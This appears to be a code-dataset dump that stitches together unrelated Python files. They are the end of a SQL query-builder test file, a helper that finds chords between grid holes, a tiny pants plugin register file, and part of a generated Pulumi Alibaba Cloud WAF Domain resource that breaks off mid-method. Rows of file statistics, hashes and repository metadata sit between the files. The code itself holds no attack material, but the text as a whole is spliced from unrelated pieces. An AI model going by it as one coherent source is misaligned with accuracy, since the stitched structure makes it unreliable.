query = sql.build_select('table', {'col1':'col1_data', 'col2':'col2_data', '__select_keyword':'DISTINCT'});
expecting = "SELECT DISTINCT * FROM table WHERE col1 = 'col1_data' AND col2 = 'col2_data'"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_select_in(self):
query = sql.build_select('table', {'col1':['col1_data', 'col2_data']});
expecting = "SELECT * FROM table WHERE col1 IN ('col1_data', 'col2_data')"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_select_not_in(self):
query = sql.build_select('table', {'col1':sql.NOT(['col1_data', 'col2_data'])});
expecting = "SELECT * FROM table WHERE col1 NOT IN ('col1_data', 'col2_data')"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_select_in_limit(self):
query = sql.build_select('table', {'col1':['col1_data', 'col2_data'], '__limit':5});
expecting = "SELECT * FROM table WHERE col1 IN ('col1_data', 'col2_data') LIMIT 5"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_select_none(self):
query = sql.build_select('table', {'col1':None});
expecting = "SELECT * FROM table WHERE col1 IS NULL"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_select_raw(self):
query = sql.build_select('table', {'col1':sql.RAW("%s = ENCRYPT('something', SUBSTRING(col1,1,2))")});
expecting = "SELECT * FROM table WHERE col1 = ENCRYPT('something', SUBSTRING(col1,1,2))"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_select_not(self):
query = sql.build_select('table', {'col1':sql.NOT("somestring")});
expecting = "SELECT * FROM table WHERE col1 <> 'somestring'"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_select_gt(self):
query = sql.build_select('table', {'col1':sql.GT("somestring")});
expecting = "SELECT * FROM table WHERE col1 > 'somestring'"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_select_lt(self):
query = sql.build_select('table', {'col1':sql.LT("somestring")});
expecting = "SELECT * FROM table WHERE col1 < 'somestring'"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
| 58.071429 | 168 | 0.63742 | 936 | 7,317 | 4.82265 | 0.086538 | 0.136464 | 0.058485 | 0.141338 | 0.912273 | 0.906735 | 0.857333 | 0.837173 | 0.79619 | 0.779353 | 0 | 0.025196 | 0.197212 | 7,317 | 125 | 169 | 58.536 | 0.743275 | 0.00984 | 0 | 0.315789 | 0 | 0.021053 | 0.396961 | 0.015193 | 0 | 0 | 0 | 0 | 0.231579 | 1 | 0.252632 | false | 0.021053 | 0.021053 | 0 | 0.284211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2462157cad2d3778fd8a660d90cfc49a9fa720f5 | 16,130 | py | Python | Tile_repartitioning/supportive_code_snipptes.py | manojMadarasingha/OpCASH | 8b7ec210fc967f66a8fe24bf08c513bb1297c4be | [
"MIT"
] | 1 | 2022-03-31T09:24:25.000Z | 2022-03-31T09:24:25.000Z | Tile_repartitioning/supportive_code_snipptes.py | manojMadarasingha/OpCASH | 8b7ec210fc967f66a8fe24bf08c513bb1297c4be | [
"MIT"
] | null | null | null | Tile_repartitioning/supportive_code_snipptes.py | manojMadarasingha/OpCASH | 8b7ec210fc967f66a8fe24bf08c513bb1297c4be | [
"MIT"
] | null | null | null | # this class contains the supportive functions to develop the algorithms
# this functions retursn the chords which are connected
# hole -- boundary line
# hole --
def find_chords_combined_with_holes(holes, concave_inds, horizontal_chords, vertical_chords, neighbour_lists):
# holes.append([[6, 8], [6, 9], [7, 9], [7, 8]])
for hole in holes:
for hole_v_ind, hole_v in enumerate(hole):
matching_coord_hori = []
matching_coord_verti = []
# ====== left upper coordinte of the hole starts========#
if hole_v_ind == 0:
max_col_ind = -1
max_row_ind = -1
# check for any matching horizontal coordinates
# check for boundary coordinates
for concave_ind in concave_inds:
if concave_ind[0] == hole_v[0]:
if concave_ind[1] < hole_v[1]:
if concave_ind[1] > max_col_ind:
max_col_ind = concave_ind[1]
matching_coord_hori = concave_ind
# check for any hole coordinate
for other_holes in holes:
if other_holes == hole:
continue
else:
# check if the other hole is at the left of the reffering hole
if other_holes[1][1] < hole_v[1]:
# are there any holes at the same level of the considered holes. This can be either upper ow lower
# edge of that particular hole
if other_holes[1][0] == hole_v[0]:
# choosing the closest other hole point near to the extracted hole
if other_holes[1][1] > max_col_ind:
max_col_ind = other_holes[1][1]
matching_coord_hori = other_holes[1]
elif other_holes[2][0] == hole_v[0]:
# choosing the closest other hole point near to the extracted hole
if other_holes[2][1] > max_col_ind:
max_col_ind = other_holes[2][1]
matching_coord_hori = other_holes[2]
####### for the moment uncomment this part as such occurence would be rarely observable
# # check for any perpendicular boundary line which crosses the chords between the 2 holes
# for neighbour_pairs in neighbour_lists:
# if other_holes[1][0] == hole_v[0]:
# check_if_chord_intersects([other_holes[1], hole_v], neighbour_pairs)
# else:
# check_if_chord_intersects([other_holes[2], hole_v], neighbour_pairs
# check for any matching vertical coordinates on the boundary
for concave_ind in concave_inds:
if concave_ind[1] == hole_v[1]:
if concave_ind[0] < hole_v[0]:
if concave_ind[0] > max_row_ind:
max_row_ind = concave_ind[0]
matching_coord_verti = concave_ind
# check for any matching vertical coordianate with another hole above the given hole.
for other_holes in holes:
if other_holes == hole:
continue
else:
# check if the other hole is at the upper of the reffering hole
if other_holes[3][0] < hole_v[0]:
# are there any holes at the same level of the considered holes. This can be either upper ow lower
# edge of that particular hole
if other_holes[3][1] == hole_v[1]:
# choosing the closest other hole point near to the extracted hole
if other_holes[3][0] > max_row_ind:
max_row_ind = other_holes[3][0]
matching_coord_verti = other_holes[3]
elif other_holes[2][1] == hole_v[1]:
# choosing the closest other hole point near to the extracted hole
if other_holes[2][0] > max_row_ind:
max_row_ind = other_holes[2][0]
matching_coord_verti = other_holes[2]
# ====== left upper coordinte of the hole ends========#
# ====== right upper coordinte of the hole starts=====#
if hole_v_ind == 1: # left upper coordinte of the hole
min_col_ind = 100
max_row_ind = -1
# check for any matching horizontal coordinates
# check for boundary coordinates right of the hole
for concave_ind in concave_inds:
if concave_ind[0] == hole_v[0]:
if concave_ind[1] > hole_v[1]:
if concave_ind[1] < min_col_ind:
min_col_ind = concave_ind[1]
matching_coord_hori = concave_ind
# check for any hole coordinate
for other_holes in holes:
if other_holes == hole:
continue
else:
# check if the other hole is at the right of the reffering hole
if other_holes[0][1] > hole_v[1]:
# are there any holes at the same level of the considered holes. This can be either upper ow lower
# edge of that particular hole
if other_holes[0][0] == hole_v[0]:
if other_holes[0][0] < min_col_ind:
min_col_ind = other_holes[0][0]
matching_coord_hori = other_holes[0]
elif other_holes[3][0] == hole_v[0]:
if other_holes[3][0] < min_col_ind:
min_col_ind = other_holes[3][0]
matching_coord_hori = other_holes[3]
# check for any matching vertical coordinates on the boundary
for concave_ind in concave_inds:
if concave_ind[1] == hole_v[1]:
if concave_ind[0] < hole_v[0]:
if concave_ind[0] > max_row_ind:
max_row_ind = concave_ind[0]
matching_coord_verti = concave_ind
# check for any matching vertical coordianate with another hole above the given hole.
for other_holes in holes:
if other_holes == hole:
continue
else:
if other_holes[3][0] < hole_v[0]:
# are there any holes at the same level of the considered holes. This can be either upper ow lower
# edge of that particular hole
if other_holes[3][1] == hole_v[1]:
# choosing the closest other hole point near to the extracted hole
if other_holes[3][0] > max_row_ind:
max_row_ind = other_holes[3][0]
matching_coord_verti = other_holes[3]
elif other_holes[2][1] == hole_v[1]:
# choosing the closest other hole point near to the extracted hole
if other_holes[2][0] > max_row_ind:
max_row_ind = other_holes[2][0]
matching_coord_verti = other_holes[2]
# ====== right upper coordinte of the hole ends========#
# ====== right lower coordinte of the hole starts======#
if hole_v_ind == 2: # left upper coordinte of the hole
min_col_ind = 100
min_row_ind = 100
# check for any matching horizontal coordinates
# check for boundary coordinates right of the hole
for concave_ind in concave_inds:
if concave_ind[0] == hole_v[0]:
if concave_ind[1] > hole_v[1]:
if concave_ind[1] < min_col_ind:
min_col_ind = concave_ind[1]
matching_coord_hori = concave_ind
# check for any hole coordinate
for other_holes in holes:
if other_holes == hole:
continue
else:
# check if the other hole is at the right of the reffering hole
if other_holes[0][1] > hole_v[1]:
# are there any holes at the same level of the considered holes. This can be either upper ow lower
# edge of that particular hole
if other_holes[0][0] == hole_v[0]:
if other_holes[0][0] < min_col_ind:
min_col_ind = other_holes[0][0]
matching_coord_hori = other_holes[0]
elif other_holes[3][0] == hole_v[0]:
if other_holes[3][0] < min_col_ind:
min_col_ind = other_holes[3][0]
matching_coord_hori = other_holes[3]
# check for any matching vertical coordinates on the boundary
for concave_ind in concave_inds:
if concave_ind[1] == hole_v[1]:
if concave_ind[0] > hole_v[0]:
if concave_ind[0] < min_row_ind:
min_row_ind = concave_ind[0]
matching_coord_verti = concave_ind
# check for any matching vertical coordianate with another hole above the given hole.
for other_holes in holes:
if other_holes == hole:
continue
else:
if other_holes[1][0] > hole_v[0]:
# are there any holes at the same level of the considered holes. This can be either upper ow lower
# edge of that particular hole
if other_holes[0][1] == hole_v[1]:
# choosing the closest other hole point near to the extracted hole
if other_holes[0][0] < min_row_ind:
min_row_ind = other_holes[0][0]
matching_coord_verti = other_holes[0]
elif other_holes[1][1] == hole_v[1]:
# choosing the closest other hole point near to the extracted hole
if other_holes[1][0] < min_row_ind:
min_row_ind = other_holes[1][0]
matching_coord_verti = other_holes[1]
# ====== right upper coordinte of the hole ends========#
# ====== left lower coordinte of the hole starts========#
if hole_v_ind == 3: # left upper coordinte of the hole
max_col_ind = -1
min_row_ind = 100
# check for any matching horizontal coordinates
# check for boundary coordinates
for concave_ind in concave_inds:
if concave_ind[0] == hole_v[0]:
if concave_ind[1] < hole_v[1]:
if concave_ind[1] > max_col_ind:
max_col_ind = concave_ind[1]
matching_coord_hori = concave_ind
# check for any hole coordinate
for other_holes in holes:
if other_holes == hole:
continue
else:
# check if the other hole is at the left of the reffering hole
if other_holes[1][1] < hole_v[1]:
# are there any holes at the same level of the considered holes. This can be either upper ow lower
# edge of that particular hole
if other_holes[1][0] == hole_v[0]:
# choosing the closest other hole point near to the extracted hole
if other_holes[1][1] > max_col_ind:
max_col_ind = other_holes[1][1]
matching_coord_hori = other_holes[1]
elif other_holes[2][0] == hole_v[0]:
# choosing the closest other hole point near to the extracted hole
if other_holes[2][1] > max_col_ind:
max_col_ind = other_holes[2][1]
matching_coord_hori = other_holes[2]
# check for any matching vertical coordinates on the boundary
for concave_ind in concave_inds:
if concave_ind[1] == hole_v[1]:
if concave_ind[0] > hole_v[0]:
if concave_ind[0] < min_row_ind:
min_row_ind = concave_ind[0]
matching_coord_verti = concave_ind
# check for any matching vertical coordianate with another hole above the given hole.
for other_holes in holes:
if other_holes == hole:
continue
else:
if other_holes[0][0] > hole_v[0]:
# are there any holes at the same level of the considered holes. This can be either upper ow lower
# edge of that particular hole
if other_holes[0][1] == hole_v[1]:
# choosing the closest other hole point near to the extracted hole
if other_holes[0][0] < min_row_ind:
min_row_ind = other_holes[0][0]
matching_coord_verti = other_holes[0]
elif other_holes[1][1] == hole_v[1]:
# choosing the closest other hole point near to the extracted hole
if other_holes[1][0] < min_row_ind:
min_row_ind = other_holes[1][0]
matching_coord_verti = other_holes[1]
# ====== left lower coordinte of the hole starts========#
if len(matching_coord_verti) > 0:
if not (([hole_v, list(matching_coord_verti)] in vertical_chords) or (
[list(matching_coord_verti), hole_v] in vertical_chords)):
vertical_chords.append([hole_v, list(matching_coord_verti)])
if len(matching_coord_hori) > 0:
if not (([hole_v, list(matching_coord_hori)] in horizontal_chords) or (
[list(matching_coord_hori), hole_v] in horizontal_chords)):
horizontal_chords.append([hole_v, list(matching_coord_hori)])
return horizontal_chords, vertical_chords
| 55.62069 | 126 | 0.468568 | 1,798 | 16,130 | 3.97386 | 0.062291 | 0.127362 | 0.068859 | 0.055983 | 0.897411 | 0.890413 | 0.874598 | 0.847726 | 0.831351 | 0.831351 | 0 | 0.027548 | 0.468878 | 16,130 | 289 | 127 | 55.813149 | 0.806467 | 0.266522 | 0 | 0.88764 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005618 | false | 0 | 0 | 0 | 0.011236 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
79ef2320c80e187b97f6a687d56ed5d9b5710f30 | 129 | py | Python | pants-plugins/experimental/cpp/lint/clangformat/register.py | sureshjoshi/pants-plugins | b3db0853bb5ab3d721a286ef698560e3d1cbb0f9 | [
"Apache-2.0"
] | 4 | 2022-02-14T23:14:21.000Z | 2022-03-29T12:39:26.000Z | pants-plugins/experimental/cpp/lint/clangformat/register.py | sureshjoshi/pants-plugins | b3db0853bb5ab3d721a286ef698560e3d1cbb0f9 | [
"Apache-2.0"
] | 36 | 2022-02-02T05:01:04.000Z | 2022-03-31T16:46:34.000Z | pants-plugins/experimental/cpp/lint/clangformat/register.py | sureshjoshi/pants-plugins | b3db0853bb5ab3d721a286ef698560e3d1cbb0f9 | [
"Apache-2.0"
] | 2 | 2022-02-14T04:16:19.000Z | 2022-03-02T11:22:37.000Z | from experimental.cpp.lint.clangformat.rules import rules as clangformat_rules
def rules():
return (*clangformat_rules(),)
| 21.5 | 78 | 0.775194 | 16 | 129 | 6.125 | 0.625 | 0.489796 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.124031 | 129 | 5 | 79 | 25.8 | 0.867257 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
03440b0d03e8896b5b2a36996a15577e311931a5 | 51,060 | py | Python | sdk/python/pulumi_alicloud/waf/domain.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 42 | 2019-03-18T06:34:37.000Z | 2022-03-24T07:08:57.000Z | sdk/python/pulumi_alicloud/waf/domain.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 152 | 2019-04-15T21:03:44.000Z | 2022-03-29T18:00:57.000Z | sdk/python/pulumi_alicloud/waf/domain.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2020-08-26T17:30:07.000Z | 2021-07-05T01:37:45.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['DomainArgs', 'Domain']
@pulumi.input_type
class DomainArgs:
def __init__(__self__, *,
instance_id: pulumi.Input[str],
is_access_product: pulumi.Input[str],
cluster_type: Optional[pulumi.Input[str]] = None,
connection_time: Optional[pulumi.Input[int]] = None,
domain: Optional[pulumi.Input[str]] = None,
domain_name: Optional[pulumi.Input[str]] = None,
http2_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_to_user_ip: Optional[pulumi.Input[str]] = None,
https_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
https_redirect: Optional[pulumi.Input[str]] = None,
load_balancing: Optional[pulumi.Input[str]] = None,
log_headers: Optional[pulumi.Input[Sequence[pulumi.Input['DomainLogHeaderArgs']]]] = None,
read_time: Optional[pulumi.Input[int]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
source_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
write_time: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a Domain resource.
:param pulumi.Input[str] instance_id: The ID of the WAF instance.
:param pulumi.Input[str] is_access_product: Specifies whether to configure a Layer-7 proxy, such as Anti-DDoS Pro or CDN, to filter the inbound traffic before it is forwarded to WAF. Valid values: `On` and `Off`. Default to `Off`.
:param pulumi.Input[str] cluster_type: The type of the WAF cluster. Valid values: `PhysicalCluster` and `VirtualCluster`. Default to `PhysicalCluster`.
:param pulumi.Input[int] connection_time: The connection timeout for WAF exclusive clusters. Unit: seconds.
:param pulumi.Input[str] domain: Field `domain` has been deprecated from version 1.94.0. Use `domain_name` instead.
:param pulumi.Input[str] domain_name: The domain that you want to add to WAF.
:param pulumi.Input[Sequence[pulumi.Input[str]]] http2_ports: List of the HTTP 2.0 ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] http_ports: List of the HTTP ports.
:param pulumi.Input[str] http_to_user_ip: Specifies whether to enable the HTTP back-to-origin feature. After this feature is enabled, the WAF instance can use HTTP to forward HTTPS requests to the origin server.
By default, port 80 is used to forward the requests to the origin server. Valid values: `On` and `Off`. Default to `Off`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] https_ports: List of the HTTPS ports.
:param pulumi.Input[str] https_redirect: Specifies whether to redirect HTTP requests as HTTPS requests. Valid values: "On" and `Off`. Default to `Off`.
:param pulumi.Input[str] load_balancing: The load balancing algorithm that is used to forward requests to the origin. Valid values: `IpHash` and `RoundRobin`. Default to `IpHash`.
:param pulumi.Input[Sequence[pulumi.Input['DomainLogHeaderArgs']]] log_headers: The key-value pair that is used to mark the traffic that flows through WAF to the domain. Each item contains two field:
* key: The key of label
* value: The value of label
:param pulumi.Input[int] read_time: The read timeout of a WAF exclusive cluster. Unit: seconds.
:param pulumi.Input[str] resource_group_id: The ID of the resource group to which the queried domain belongs in Resource Management. By default, no value is specified, indicating that the domain belongs to the default resource group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_ips: List of the IP address or domain of the origin server to which the specified domain points.
:param pulumi.Input[int] write_time: The timeout period for a WAF exclusive cluster write connection. Unit: seconds.
"""
pulumi.set(__self__, "instance_id", instance_id)
pulumi.set(__self__, "is_access_product", is_access_product)
if cluster_type is not None:
pulumi.set(__self__, "cluster_type", cluster_type)
if connection_time is not None:
pulumi.set(__self__, "connection_time", connection_time)
if domain is not None:
warnings.warn("""Field 'domain' has been deprecated from version 1.94.0. Use 'domain_name' instead.""", DeprecationWarning)
pulumi.log.warn("""domain is deprecated: Field 'domain' has been deprecated from version 1.94.0. Use 'domain_name' instead.""")
if domain is not None:
pulumi.set(__self__, "domain", domain)
if domain_name is not None:
pulumi.set(__self__, "domain_name", domain_name)
if http2_ports is not None:
pulumi.set(__self__, "http2_ports", http2_ports)
if http_ports is not None:
pulumi.set(__self__, "http_ports", http_ports)
if http_to_user_ip is not None:
pulumi.set(__self__, "http_to_user_ip", http_to_user_ip)
if https_ports is not None:
pulumi.set(__self__, "https_ports", https_ports)
if https_redirect is not None:
pulumi.set(__self__, "https_redirect", https_redirect)
if load_balancing is not None:
pulumi.set(__self__, "load_balancing", load_balancing)
if log_headers is not None:
pulumi.set(__self__, "log_headers", log_headers)
if read_time is not None:
pulumi.set(__self__, "read_time", read_time)
if resource_group_id is not None:
pulumi.set(__self__, "resource_group_id", resource_group_id)
if source_ips is not None:
pulumi.set(__self__, "source_ips", source_ips)
if write_time is not None:
pulumi.set(__self__, "write_time", write_time)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> pulumi.Input[str]:
"""
The ID of the WAF instance.
"""
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: pulumi.Input[str]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter(name="isAccessProduct")
def is_access_product(self) -> pulumi.Input[str]:
"""
Specifies whether to configure a Layer-7 proxy, such as Anti-DDoS Pro or CDN, to filter the inbound traffic before it is forwarded to WAF. Valid values: `On` and `Off`. Default to `Off`.
"""
return pulumi.get(self, "is_access_product")
@is_access_product.setter
def is_access_product(self, value: pulumi.Input[str]):
pulumi.set(self, "is_access_product", value)
@property
@pulumi.getter(name="clusterType")
def cluster_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the WAF cluster. Valid values: `PhysicalCluster` and `VirtualCluster`. Default to `PhysicalCluster`.
"""
return pulumi.get(self, "cluster_type")
@cluster_type.setter
def cluster_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_type", value)
@property
@pulumi.getter(name="connectionTime")
def connection_time(self) -> Optional[pulumi.Input[int]]:
"""
The connection timeout for WAF exclusive clusters. Unit: seconds.
"""
return pulumi.get(self, "connection_time")
@connection_time.setter
def connection_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "connection_time", value)
@property
@pulumi.getter
def domain(self) -> Optional[pulumi.Input[str]]:
"""
Field `domain` has been deprecated from version 1.94.0. Use `domain_name` instead.
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> Optional[pulumi.Input[str]]:
"""
The domain that you want to add to WAF.
"""
return pulumi.get(self, "domain_name")
@domain_name.setter
def domain_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain_name", value)
@property
@pulumi.getter(name="http2Ports")
def http2_ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of the HTTP 2.0 ports.
"""
return pulumi.get(self, "http2_ports")
@http2_ports.setter
def http2_ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "http2_ports", value)
@property
@pulumi.getter(name="httpPorts")
def http_ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of the HTTP ports.
"""
return pulumi.get(self, "http_ports")
@http_ports.setter
def http_ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "http_ports", value)
@property
@pulumi.getter(name="httpToUserIp")
def http_to_user_ip(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether to enable the HTTP back-to-origin feature. After this feature is enabled, the WAF instance can use HTTP to forward HTTPS requests to the origin server.
By default, port 80 is used to forward the requests to the origin server. Valid values: `On` and `Off`. Default to `Off`.
"""
return pulumi.get(self, "http_to_user_ip")
@http_to_user_ip.setter
def http_to_user_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "http_to_user_ip", value)
@property
@pulumi.getter(name="httpsPorts")
def https_ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of the HTTPS ports.
"""
return pulumi.get(self, "https_ports")
@https_ports.setter
def https_ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "https_ports", value)
@property
@pulumi.getter(name="httpsRedirect")
def https_redirect(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether to redirect HTTP requests as HTTPS requests. Valid values: "On" and `Off`. Default to `Off`.
"""
return pulumi.get(self, "https_redirect")
@https_redirect.setter
def https_redirect(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "https_redirect", value)
@property
@pulumi.getter(name="loadBalancing")
def load_balancing(self) -> Optional[pulumi.Input[str]]:
"""
The load balancing algorithm that is used to forward requests to the origin. Valid values: `IpHash` and `RoundRobin`. Default to `IpHash`.
"""
return pulumi.get(self, "load_balancing")
@load_balancing.setter
def load_balancing(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "load_balancing", value)
@property
@pulumi.getter(name="logHeaders")
def log_headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DomainLogHeaderArgs']]]]:
"""
The key-value pair that is used to mark the traffic that flows through WAF to the domain. Each item contains two field:
* key: The key of label
* value: The value of label
"""
return pulumi.get(self, "log_headers")
@log_headers.setter
def log_headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DomainLogHeaderArgs']]]]):
pulumi.set(self, "log_headers", value)
@property
@pulumi.getter(name="readTime")
def read_time(self) -> Optional[pulumi.Input[int]]:
"""
The read timeout of a WAF exclusive cluster. Unit: seconds.
"""
return pulumi.get(self, "read_time")
@read_time.setter
def read_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "read_time", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the resource group to which the queried domain belongs in Resource Management. By default, no value is specified, indicating that the domain belongs to the default resource group.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_id", value)
@property
@pulumi.getter(name="sourceIps")
def source_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of the IP address or domain of the origin server to which the specified domain points.
"""
return pulumi.get(self, "source_ips")
@source_ips.setter
def source_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "source_ips", value)
@property
@pulumi.getter(name="writeTime")
def write_time(self) -> Optional[pulumi.Input[int]]:
"""
The timeout period for a WAF exclusive cluster write connection. Unit: seconds.
"""
return pulumi.get(self, "write_time")
@write_time.setter
def write_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "write_time", value)
@pulumi.input_type
class _DomainState:
def __init__(__self__, *,
cluster_type: Optional[pulumi.Input[str]] = None,
cname: Optional[pulumi.Input[str]] = None,
connection_time: Optional[pulumi.Input[int]] = None,
domain: Optional[pulumi.Input[str]] = None,
domain_name: Optional[pulumi.Input[str]] = None,
http2_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_to_user_ip: Optional[pulumi.Input[str]] = None,
https_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
https_redirect: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
is_access_product: Optional[pulumi.Input[str]] = None,
load_balancing: Optional[pulumi.Input[str]] = None,
log_headers: Optional[pulumi.Input[Sequence[pulumi.Input['DomainLogHeaderArgs']]]] = None,
read_time: Optional[pulumi.Input[int]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
source_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
write_time: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering Domain resources.
:param pulumi.Input[str] cluster_type: The type of the WAF cluster. Valid values: `PhysicalCluster` and `VirtualCluster`. Default to `PhysicalCluster`.
:param pulumi.Input[str] cname: The CNAME record assigned by the WAF instance to the specified domain.
:param pulumi.Input[int] connection_time: The connection timeout for WAF exclusive clusters. Unit: seconds.
:param pulumi.Input[str] domain: Field `domain` has been deprecated from version 1.94.0. Use `domain_name` instead.
:param pulumi.Input[str] domain_name: The domain that you want to add to WAF.
:param pulumi.Input[Sequence[pulumi.Input[str]]] http2_ports: List of the HTTP 2.0 ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] http_ports: List of the HTTP ports.
:param pulumi.Input[str] http_to_user_ip: Specifies whether to enable the HTTP back-to-origin feature. After this feature is enabled, the WAF instance can use HTTP to forward HTTPS requests to the origin server.
By default, port 80 is used to forward the requests to the origin server. Valid values: `On` and `Off`. Default to `Off`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] https_ports: List of the HTTPS ports.
:param pulumi.Input[str] https_redirect: Specifies whether to redirect HTTP requests as HTTPS requests. Valid values: "On" and `Off`. Default to `Off`.
:param pulumi.Input[str] instance_id: The ID of the WAF instance.
:param pulumi.Input[str] is_access_product: Specifies whether to configure a Layer-7 proxy, such as Anti-DDoS Pro or CDN, to filter the inbound traffic before it is forwarded to WAF. Valid values: `On` and `Off`. Default to `Off`.
:param pulumi.Input[str] load_balancing: The load balancing algorithm that is used to forward requests to the origin. Valid values: `IpHash` and `RoundRobin`. Default to `IpHash`.
:param pulumi.Input[Sequence[pulumi.Input['DomainLogHeaderArgs']]] log_headers: The key-value pair that is used to mark the traffic that flows through WAF to the domain. Each item contains two field:
* key: The key of label
* value: The value of label
:param pulumi.Input[int] read_time: The read timeout of a WAF exclusive cluster. Unit: seconds.
:param pulumi.Input[str] resource_group_id: The ID of the resource group to which the queried domain belongs in Resource Management. By default, no value is specified, indicating that the domain belongs to the default resource group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_ips: List of the IP address or domain of the origin server to which the specified domain points.
:param pulumi.Input[int] write_time: The timeout period for a WAF exclusive cluster write connection. Unit: seconds.
"""
if cluster_type is not None:
pulumi.set(__self__, "cluster_type", cluster_type)
if cname is not None:
pulumi.set(__self__, "cname", cname)
if connection_time is not None:
pulumi.set(__self__, "connection_time", connection_time)
if domain is not None:
warnings.warn("""Field 'domain' has been deprecated from version 1.94.0. Use 'domain_name' instead.""", DeprecationWarning)
